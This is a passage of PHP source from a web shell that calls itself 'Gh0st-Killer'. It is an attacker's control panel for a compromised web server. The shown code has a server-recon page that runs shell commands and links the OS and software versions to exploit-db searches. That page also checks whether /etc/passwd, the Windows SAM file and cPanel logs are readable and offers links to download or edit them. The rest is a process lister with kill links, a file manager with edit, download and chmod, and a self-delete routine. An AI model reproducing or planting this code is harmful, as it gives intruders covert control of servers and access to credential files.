  3094.  echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
  3095.  
  3096.  foreach(array("md5","crypt","sha1","crc32") as $v)
  3097.  
  3098.  {
  3099.   echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  3100.  }
  3101.  
  3102.  echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  3103.  
  3104. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
  3105.  
  3106. <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  3107.  
  3108.  echo "<center>base64_decode - ";
  3109.  
  3110.  if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
  3111.  
  3112.  else
  3113.  
  3114.  {
  3115.  
  3116.   $debase64 = base64_decode($encoder_input);
  3117.  
  3118.   $debase64 = str_replace("\0","[0]",$debase64);
  3119.  
  3120.   $a = explode("\r\n",$debase64);
  3121.  
  3122.   $rows = count($a);
  3123.  
  3124.   $debase64 = htmlspecialchars($debase64);
  3125.  
  3126.   if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  3127.  
  3128.   else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  3129.  
  3130.   echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
  3131.  
  3132.  }
  3133.  
  3134.  echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  3135.  
  3136.  $c = strlen($encoder_input);
  3137.  
  3138.  for($i=0;$i<$c;$i++)
  3139.  
  3140.  {
  3141.   $hex = dechex(ord($encoder_input[$i]));
  3142.  
  3143.   if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  3144.  
  3145.   elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  3146.  }
  3147.  
  3148.  echo "\" readonly><br></center></form>";
  3149.  
  3150. }
  3151.  
  3152. if ($act == "selfremove")
  3153. {
  3154.  if (($submit == $rndcode) and ($submit != ""))
  3155.  
  3156.  {
  3157.  
  3158.   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using Gh0st-Killer v.".$shver."!"; ghostext(); }
  3159.  
  3160.   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  3161.  
  3162.  }
  3163.  
  3164.  else
  3165.  
  3166.  {
  3167.  
  3168.   if (!empty($rndcode)) {echo "<b>Error: Incorrect Confirmation!</b>";}
  3169.  
  3170.   $rnd = rand(0,9).rand(0,9).rand(0,9);
  3171.  
  3172.   echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
  3173.  
  3174.  }
  3175.  
  3176. }
  3177.  
  3178. if ($act == "serverinfo")
  3179. {
  3180.  
  3181. global $windows,$disablefunctions,$safemode;
  3182. $cwd= getcwd();
  3183. $mil="<a target=\"_blank\" href=\"http://www.exploit-db.com/search/?action=search&filter_exploit_text=";
  3184. $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
  3185. if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
  3186. $osver=$tsize=$fsize='';
  3187. if ($windows){
  3188. $osver = "  (".shelL("ver").")";
  3189. $sysroot = shelL("echo %systemroot%");
  3190. if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
  3191. if (empty($sysroot)) $sysroot = getenv("windir");
  3192. if (empty($sysroot)) $sysroot = "Not Found";
  3193. if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
  3194. for ($i=66;$i<=90;$i++){
  3195. $drive= chr($i).':\\';
  3196. if (is_dir($drive)){
  3197. $fsize+=@disk_free_space($drive);
  3198. $tsize+=@disk_total_space($drive);
  3199. }
  3200. }
  3201. }else{
  3202. $fsize=disk_free_space('/');
  3203. $tsize=disk_total_space('/');
  3204. }
  3205. $disksize="Used Space: ". showsizE($tsize-$fsize) . "   Free Space: ". showsizE($fsize) . "   Total Space: ". showsizE($tsize);
  3206. if (empty($CPU)) $CPU = "Unknown";
  3207. $os = php_unamE();
  3208. $osn=php_unamE('s');
  3209. if(!$windows){
  3210. $ker = php_unamE('r');
  3211. $o=($osn=="Linux")?"Linux+Kernel":$osn;
  3212. $os = str_replace($osn,"${mil}$o\"><font color='yellow'>$osn</font></a>",$os);
  3213. $os = str_replace($ker,"${mil}Linux+Kernel\"><font color='yellow'>$ker</font></a>",$os);
  3214. $inpa=':';
  3215. }else{
  3216. $sam = $sysroot."\\system32\\config\\SAM";
  3217. $inpa=';';
  3218. $os = str_replace($osn,"${mil}MS+Windows\"><font color='yellow'>$osn</font></a>",$os);
  3219. }
  3220. $software=str_replace("Apache","${mil}Apache\"><font color='#66ffff'>Apache</font></a>",$_SERVER['SERVER_SOFTWARE']);
  3221. echo "
  3222. <table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"  width=\"100%\" >
  3223. <tr><td><b>Server information:</b></td></tr>
  3224. <tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td>
  3225. <td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"];
  3226. if (!empty($_SERVER["SERVER_ADDR"])){
  3227.  echo "(". $_SERVER["SERVER_ADDR"] .")";}
  3228. echo "
  3229. </td></tr>
  3230. <tr><td width=\"25%\" >Operation System:</td>    <td >$os$osver</td></tr>
  3231. <tr><td width=\"25%\" bgcolor=\"#666666\">Web server Application:</td>  <td bgcolor=\"#666666\">$software</td></tr>
  3232. <tr><td width=\"25%\" >CPU:</td>  <td >$CPU</td></tr>
  3233. <td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr>
  3234. <tr><td width=\"25%\" >User domain:</td><td >";
  3235. if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];
  3236. else echo "Unknown";
  3237. echo "
  3238. </td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><a href=\"".$surl."act=processes\" ><font color=#66ffff>User Name </font>:</a></td>
  3239. <td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();
  3240. else echo "Unknown"; echo "</td></tr>";
  3241. if ($windows){
  3242. echo "
  3243. <tr><td width=\"25%\" >Windows directory:</td><td ><a href=\"".$surl."act=ls&d=$sysroot"."\"><font color=yellow>$sysroot</font></a></td></tr><tr>
  3244. <td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";
  3245. if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">
  3246. <font color=#66ffff>Readable</font></a>"; else echo "Not readable";echo "</td></tr>";
  3247. }
  3248. else
  3249. {
  3250. echo "<tr><td width=\"25%\" >Passwd file:</td><td >";
  3251. if (is_readable('/etc/passwd')) echo "
  3252. <a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
  3253. if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\"><font color=#66ffff>Readable</font></a>"; else echo "Not readable";}else echo "Not found";
  3254. echo "</td></tr>";
  3255. }
  3256. $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
  3257. echo "
  3258. <tr><td width=\"25%\" >${mil}PHP\"><font color=yellow>PHP</font></a> version:</td>
  3259. <td ><a href=\"?=".php_logo_guid()."\" target=\"_blank\"><font color=yellow>".PHP_VERSION."</font></a>
  3260. (<a href=\"".$surl."act=phpinfo\"><font color=yellow>more...</font></a>)</td></tr>
  3261. <tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td>
  3262. <td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\"><font color=#66ffff>".zend_version()."</font></a>";
  3263. else echo "Not Found";echo "</td>
  3264. <tr><td width=\"25%\" >Include path:</td>
  3265. <td >".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td>
  3266. <tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td>
  3267. <td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";
  3268. echo "</td><tr><td width=\"25%\" >Disabled functions:</td><td >";
  3269. if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr>
  3270. <tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$sfmode</font></td></tr>
  3271. <tr><td width=\"25%\" >Open base dir:</td><td >$basedir</td></tr>
  3272. <tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td>
  3273. <td bgcolor=\"#666666\">";$sq="";
  3274. if(function_exists('mysql_connect')) $sq= "${mil}MySQL\"><font color=#66ffff>MySQL</font></a> ";
  3275. if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\"><font color=#66ffff>MSSQL</font></a> ";
  3276. if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\"><font color=#66ffff>Oracle</font></a> ";
  3277. if(function_exists('sqlite_open')) $sq.= " SQLite ";
  3278. if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\"><font color=#66ffff>PostgreSQL</font></a> ";
  3279. if(function_exists('msql_connect')) $sq.= " mSQL ";
  3280. if(function_exists('mysqli_connect'))$sq.= " MySQLi ";
  3281. if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";
  3282. if ($sq=="") $sq= "Nothing";
  3283.  
  3284. echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" >cURL support:</td><td >Enabled ";
  3285. if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "</table>";
  3286.  
  3287. }
  3288.  
  3289. if ($act == "clientinfo")
  3290. {
  3291. echo "<table><tr><td><b>User information</b>:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">".$_SERVER['REMOTE_ADDR']."</td></tr><tr><td width=\"25%\" >Agent:</td><td >".getenv('HTTP_USER_AGENT')."</td></tr></table>";
  3292. }
  3293.  
  3294. if ($act == "processes")
  3295.  
  3296. {
  3297.  
  3298.  echo "<b>Processes:</b><br>";
  3299.  
  3300.  if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  3301.  
  3302.  else {$handler = "tasklist";}
  3303.  
  3304.  $ret = myshellexec($handler);
  3305.  
  3306.  if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  3307.  
  3308.  else
  3309.  
  3310.  {
  3311.  
  3312.   if (empty($processes_sort)) {$processes_sort = $sort_default;}
  3313.  
  3314.   $parsesort = parsesort($processes_sort);
  3315.  
  3316.   if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  3317.  
  3318.   $k = $parsesort[0];
  3319.  
  3320.   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  3321.  
  3322.   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  3323.  
  3324.   $ret = htmlspecialchars($ret);
  3325.  
  3326.   if (!$win)
  3327.  
  3328.   {
  3329.  
  3330.    if ($pid)
  3331.  
  3332.    {
  3333.  
  3334.     if (is_null($sig)) {$sig = 9;}
  3335.  
  3336.     echo "Sending signal ".$sig." to #".$pid."... ";
  3337.  
  3338.     if (posix_kill($pid,$sig)) {echo "OK.";}
  3339.  
  3340.     else {echo "ERROR.";}
  3341.  
  3342.    }
  3343.  
  3344.    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  3345.  
  3346.    $stack = explode("\n",$ret);
  3347.  
  3348.    $head = explode(" ",$stack[0]);
  3349.  
  3350.    unset($stack[0]);
  3351.  
  3352.    for($i=0;$i<count($head);$i++)
  3353.  
  3354.    {
  3355.  
  3356.     if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
  3357.  
  3358.    }
  3359.  
  3360.    $prcs = array();
  3361.  
  3362.    foreach ($stack as $line)
  3363.  
  3364.    {
  3365.  
  3366.     if (!empty($line))
  3367.  
  3368. {
  3369.  
  3370.  echo "<tr>";
  3371.  
  3372.      $line = explode(" ",$line);
  3373.  
  3374.      $line[10] = join(" ",array_slice($line,10));
  3375.  
  3376.      $line = array_slice($line,0,11);
  3377.  
  3378.      if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
  3379.  
  3380.      $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  3381.  
  3382.      $prcs[] = $line;
  3383.  
  3384.      echo "</tr>";
  3385.  
  3386.     }
  3387.  
  3388.    }
  3389.  
  3390.   }
  3391.  
  3392.   else
  3393.  
  3394.   {
  3395.  
  3396.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3397.  
  3398.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3399.  
  3400.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3401.  
  3402.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3403.  
  3404.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3405.  
  3406.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3407.  
  3408.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3409.  
  3410.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3411.  
  3412.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  3413.  
  3414.    while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  3415.  
  3416.    while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  3417.  
  3418.    $ret = convert_cyr_string($ret,"d","w");
  3419.  
  3420.    $stack = explode("\n",$ret);
  3421.  
  3422.    unset($stack[0],$stack[2]);
  3423.  
  3424.    $stack = array_values($stack);
  3425.  
  3426.    $head = explode("",$stack[0]);
  3427.  
  3428.    $head[1] = explode(" ",$head[1]);
  3429.  
  3430.    $head[1] = $head[1][0];
  3431.  
  3432.    $stack = array_slice($stack,1);
  3433.  
  3434.    unset($head[2]);
  3435.  
  3436.    $head = array_values($head);
  3437.  
  3438.    if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  3439.  
  3440.    else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  3441.  
  3442.    if ($k > count($head)) {$k = count($head)-1;}
  3443.  
  3444.    for($i=0;$i<count($head);$i++)
  3445.  
  3446.    {
  3447.  
  3448.     if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
  3449.  
  3450.    }
  3451.  
  3452.    $prcs = array();
  3453.  
  3454.    foreach ($stack as $line)
  3455.  
  3456.    {
  3457.  
  3458.     if (!empty($line))
  3459.  
  3460.     {
  3461.  
  3462.      echo "<tr>";
  3463.  
  3464.      $line = explode("",$line);
  3465.  
  3466.      $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  3467.  
  3468.      $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  3469.  
  3470.      $prcs[] = $line;
  3471.  
  3472.      echo "</tr>";
  3473.  
  3474.     }
  3475.  
  3476.    }
  3477.  
  3478.   }
  3479.  
  3480.   $head[$k] = "<b>".$head[$k]."</b>".$y;
  3481.  
  3482.   $v = $processes_sort[0];
  3483.  
  3484.   usort($prcs,"tabsort");
  3485.  
  3486.   if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  3487.  
  3488.   $tab = array();
  3489.  
  3490.   $tab[] = $head;
  3491.  
  3492.   $tab = array_merge($tab,$prcs);
  3493.  
  3494.   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  3495.  
  3496.   foreach($tab as $i=>$k)
  3497.  
  3498.   {
  3499.  
  3500.    echo "<tr>";
  3501.  
  3502.    foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
  3503.  
  3504.    echo "</tr>";
  3505.  
  3506.   }
  3507.  
  3508.   echo "</table>";
  3509.  
  3510.  }
  3511.  
  3512. }
  3513.  
  3514. if ($act == "ls")
  3515. {
  3516.  if (count($ls_arr) > 0) {$list = $ls_arr;}
  3517.  else
  3518.  {
  3519.  
  3520.   $list = array();
  3521.  
  3522.   if ($h = @opendir($d))
  3523.  
  3524.   {
  3525.  
  3526.    while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  3527.  
  3528.    closedir($h);
  3529.  
  3530.   }
  3531.  
  3532.   else {}
  3533.  
  3534.  }
  3535.  
  3536.  if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
  3537.  else
  3538.  {
  3539.  
  3540.   //Building array
  3541.  
  3542.   $objects = array();
  3543.  
  3544.   $vd = "f"; //Viewing mode
  3545.  
  3546.   if ($vd == "f")
  3547.  
  3548.   {
  3549.  
  3550.    $objects["head"] = array();
  3551.  
  3552.    $objects["folders"] = array();
  3553.  
  3554.    $objects["links"] = array();
  3555.  
  3556.    $objects["files"] = array();
  3557.  
  3558.    foreach ($list as $v)
  3559.  
  3560.    {
  3561.  
  3562.     $o = basename($v);
  3563.  
  3564.     $row = array();
  3565.  
  3566.     if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
  3567.  
  3568.     elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
  3569.  
  3570.     elseif (is_dir($v))
  3571.  
  3572.     {
  3573.  
  3574.      if (is_link($v)) {$type = "LINK";}
  3575.  
  3576.      else {$type = "DIR";}
  3577.  
  3578.      $row[] = $v;
  3579.  
  3580.      $row[] = $type;
  3581.  
  3582.     }
  3583.  
  3584.     elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  3585.  
  3586.     $row[] = filemtime($v);
  3587.  
  3588.     if (!$win)
  3589.  
  3590.     {
  3591.  
  3592.      $ow = posix_getpwuid(fileowner($v));
  3593.  
  3594.      $gr = posix_getgrgid(filegroup($v));
  3595.  
  3596.      $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  3597.  
  3598.     }
  3599.  
  3600.     $row[] = fileperms($v);
  3601.  
  3602.     if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  3603.  
  3604.     elseif (is_link($v)) {$objects["links"][] = $row;}
  3605.  
  3606.     elseif (is_dir($v)) {$objects["folders"][] = $row;}
  3607.  
  3608.     elseif (is_file($v)) {$objects["files"][] = $row;}
  3609.  
  3610.     $i++;
  3611.  
  3612.    }
  3613.  
  3614.    $row = array();
  3615.  
  3616.    $row[] = "<b>Name</b>";
  3617.  
  3618.    $row[] = "<b>Size</b>";
  3619.  
  3620.    $row[] = "<b>Modify</b>";
  3621.  
  3622.    if (!$win)
  3623.  
  3624.   {$row[] = "<b>Owner/Group</b>";}
  3625.  
  3626.    $row[] = "<b>Perms</b>";
  3627.  
  3628.    $row[] = "<b>Action</b>";
  3629.  
  3630.    $parsesort = parsesort($sort);
  3631.  
  3632.    $sort = $parsesort[0].$parsesort[1];
  3633.  
  3634.    $k = $parsesort[0];
  3635.  
  3636.    if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  3637.  
  3638.    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  3639.  
  3640.    $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  3641.  
  3642.    $row[$k] .= $y;
  3643.  
  3644.    for($i=0;$i<count($row)-1;$i++)
  3645.  
  3646.    {
  3647.  
  3648.     if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  3649.  
  3650.    }
  3651.  
  3652.    $v = $parsesort[0];
  3653.  
  3654.    usort($objects["folders"], "tabsort");
  3655.  
  3656.    usort($objects["links"], "tabsort");
  3657.  
  3658.    usort($objects["files"], "tabsort");
  3659.  
  3660.    if ($parsesort[1] == "d")
  3661.  
  3662.    {
  3663.  
  3664.     $objects["folders"] = array_reverse($objects["folders"]);
  3665.  
  3666.     $objects["files"] = array_reverse($objects["files"]);
  3667.  
  3668.    }
  3669.  
  3670.    $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  3671.  
  3672.    $tab = array();
  3673.  
  3674.    $tab["cols"] = array($row);
  3675.  
  3676.    $tab["head"] = array();
  3677.  
  3678.    $tab["folders"] = array();
  3679.  
  3680.    $tab["links"] = array();
  3681.  
  3682.    $tab["files"] = array();
  3683.  
  3684.    $i = 0;
  3685.  
  3686.    foreach ($objects as $a)
  3687.  
  3688.    {
  3689.  
  3690.     $v = $a[0];
  3691.  
  3692.     $o = basename($v);
  3693.  
  3694.     $dir = dirname($v);
  3695.  
  3696.     if ($disp_fullpath) {$disppath = $v;}
  3697.  
  3698.     else {$disppath = $o;}
  3699.  
  3700.     $disppath = str2mini($disppath,60);
  3701.  
  3702.     if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  3703.  
  3704.     elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  3705.  
  3706.     foreach ($regxp_highlight as $r)
  3707.  
  3708.     {
  3709.  
  3710.      if (ereg($r[0],$o))
  3711.  
  3712.      {
  3713.  
  3714.       if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; ghostext();}
  3715.  
  3716.       else
  3717.  
  3718.       {
  3719.  
  3720.        $r[1] = round($r[1]);
  3721.  
  3722.        $isdir = is_dir($v);
  3723.  
  3724.        if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
  3725.  
  3726.        {
  3727.  
  3728.         if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  3729.  
  3730.         $disppath = $r[2].$disppath.$r[3];
  3731.  
  3732.         if ($r[4]) {break;}
  3733.  
  3734.        }
  3735.  
  3736.       }
  3737.  
  3738.      }
  3739.  
  3740.     }
  3741.  
  3742.     $uo = urlencode($o);
  3743.  
  3744.     $ud = urlencode($dir);
  3745.  
  3746.     $uv = urlencode($v);
  3747.  
  3748.     $row = array();
  3749.  
  3750.     if ($o == ".")
  3751.  
  3752.     {
  3753.  
  3754.      $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  3755.  
  3756.      $row[] = "LINK";
  3757.  
  3758.     }
  3759.  
  3760.     elseif ($o == "..")
  3761.  
  3762.     {
  3763.  
  3764.      $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  3765.  
  3766.      $row[] = "LINK";
  3767.  
  3768.     }
  3769.  
  3770.     elseif (is_dir($v))
  3771.  
  3772.     {
  3773.  
  3774.      if (is_link($v))
  3775.  
  3776.      {
  3777.  
  3778.       $disppath .= " => ".readlink($v);
  3779.  
  3780.       $type = "LINK";
  3781.  
  3782.       $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  3783.  
  3784.      }
  3785.  
  3786.      else
  3787.  
  3788.      {
  3789.  
  3790.       $type = "DIR";
  3791.  
  3792.       $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  3793.  
  3794.       }
  3795.  
  3796.      $row[] = $type;
  3797.  
  3798.     }
  3799.  
  3800.     elseif(is_file($v))
  3801.  
  3802.     {
  3803.  
  3804.      $ext = explode(".",$o);
  3805.  
  3806.      $c = count($ext)-1;
  3807.  
  3808.      $ext = $ext[$c];
  3809.  
  3810.      $ext = strtolower($ext);
  3811.  
  3812.      $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
  3813.  
  3814.      $row[] = view_size($a[1]);
  3815.  
  3816.     }
  3817.  
  3818.     $row[] = date("d.m.Y H:i:s",$a[2]);
  3819.  
  3820.     if (!$win) {$row[] = $a[3];}
  3821.  
  3822.     $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  3823.  
  3824.     if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
  3825.  
  3826.     else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  3827.  
  3828.     if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
  3829.  
  3830.     else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
  3831.  
  3832.     if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  3833.  
  3834.     elseif (is_link($v)) {$tab["links"][] = $row;}
  3835.  
  3836.     elseif (is_dir($v)) {$tab["folders"][] = $row;}
  3837.  
  3838.     elseif (is_file($v)) {$tab["files"][] = $row;}
  3839.  
  3840.     $i++;
  3841.  
  3842.    }
  3843.  
  3844.   }
  3845.  
  3846.   // Compiling table
  3847.  
  3848.   $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  3849.  
